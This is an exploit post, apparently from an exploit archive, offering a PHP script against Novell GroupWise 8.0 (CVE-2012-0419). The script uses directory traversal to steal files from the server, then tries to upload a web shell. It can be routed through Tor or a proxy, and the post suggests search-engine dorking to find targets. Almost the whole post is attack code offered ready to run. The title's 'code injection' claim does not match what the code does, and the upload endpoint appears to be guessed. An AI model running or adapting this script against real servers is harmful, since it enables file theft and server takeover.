=============================================================================================================================================
| # Title     : Novell GroupWise 8.0 before Support Pack 3 PHP Code Injection Vulnerability                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.novell.com/documentation//gw8/gw8_readmeen_sp3/data/gw8_readmeen_sp3.html                                       |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This code exploits the Directory Traversal vulnerability in Novell GroupWise to steal files, and attempts to upload a Web Shell payload if possible, making it an effective penetration testing tool.
	
	( https://packetstorm.news/files/id/181042/	CVE-2012-0419 )
	
[+] save code as poc.php.

[+] Set Target : line 124

[+] USage : php poc.php 

[+] PayLoad :

<?php

class NovellGroupwiseExploit {
    private $target;
    private $port;
    private $filePath;
    private $depth;
    private $proxy;
    private $useTor;
    private $osList = ['Windows', 'Linux', 'MacOS'];

    public function __construct($target, $port = 7181, $filePath = '/windows/win.ini', $depth = 10, $proxy = null, $useTor = false) {
        $this->target = $target;
        $this->port = $port;
        $this->filePath = $filePath;
        $this->depth = $depth;
        $this->proxy = $proxy;
        $this->useTor = $useTor;
    }

    private function sendRequest($url, $postData = null) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        
        if ($this->proxy) {
            curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
        }
        
        if ($this->useTor) {
            curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');
            curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
        }
        
        if ($postData) {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        }
        
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    private function isGroupwise() {
        $url = "http://{$this->target}:{$this->port}/";
        $response = $this->sendRequest($url);
        return strpos($response, 'GroupWise') !== false;
    }

    public function exploit() {
        if (!$this->isGroupwise()) {
            echo "[!] {$this->target}:{$this->port} - Not a GroupWise Agent HTTP Interface\n";
            return;
        }
        
        foreach ($this->osList as $os) {
            echo "[*] Checking for OS: $os\n";
        }
        
        $traversal = str_repeat("../", $this->depth) . ltrim($this->filePath, '/');
        $url = "http://{$this->target}:{$this->port}/help/" . $traversal;
        
        echo "[*] Sending request to $url ...\n";
        $response = $this->sendRequest($url);
        
        if ($response) {
            $fileName = basename($this->filePath);
            file_put_contents($fileName, $response);
            echo "[+] File saved: $fileName\n";
        } else {
            echo "[!] Failed to retrieve file\n";
        }
    }

    public function uploadPayload($payloadPath) {
        $uploadUrl = "http://{$this->target}:{$this->port}/upload";
        echo "[*] Attempting to upload payload to $uploadUrl ...\n";

        $payload = file_get_contents($payloadPath);
        if (!$payload) {
            echo "[!] Failed to read payload file\n";
            return;
        }

        $boundary = "----WebKitFormBoundary" . md5(time());
        $data = "--$boundary\r\n";
        $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($payloadPath) . "\"\r\n";
        $data .= "Content-Type: application/octet-stream\r\n\r\n";
        $data .= $payload . "\r\n";
        $data .= "--$boundary--\r\n";

        $headers = [
            "Content-Type: multipart/form-data; boundary=$boundary"
        ];

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $uploadUrl);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

        if ($this->proxy) {
            curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
        }
        
        if ($this->useTor) {
            curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');
            curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
        }

        $result = curl_exec($ch);
        curl_close($ch);

        if ($result) {
            echo "[+] Payload uploaded successfully!\n";
        } else {
            echo "[!] Failed to upload payload\n";
        }
    }
}

$target = '192.168.1.100'; // قم بتغيير الهدف
$exploit = new NovellGroupwiseExploit($target, 7181, '/windows/win.ini', 10, 'http://127.0.0.1:8080', false);
$exploit->exploit();

// تجربة رفع حمولة
$payloadPath = 'shell.php'; // قم بتغيير اسم الحمولة
$exploit->uploadPayload($payloadPath);



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================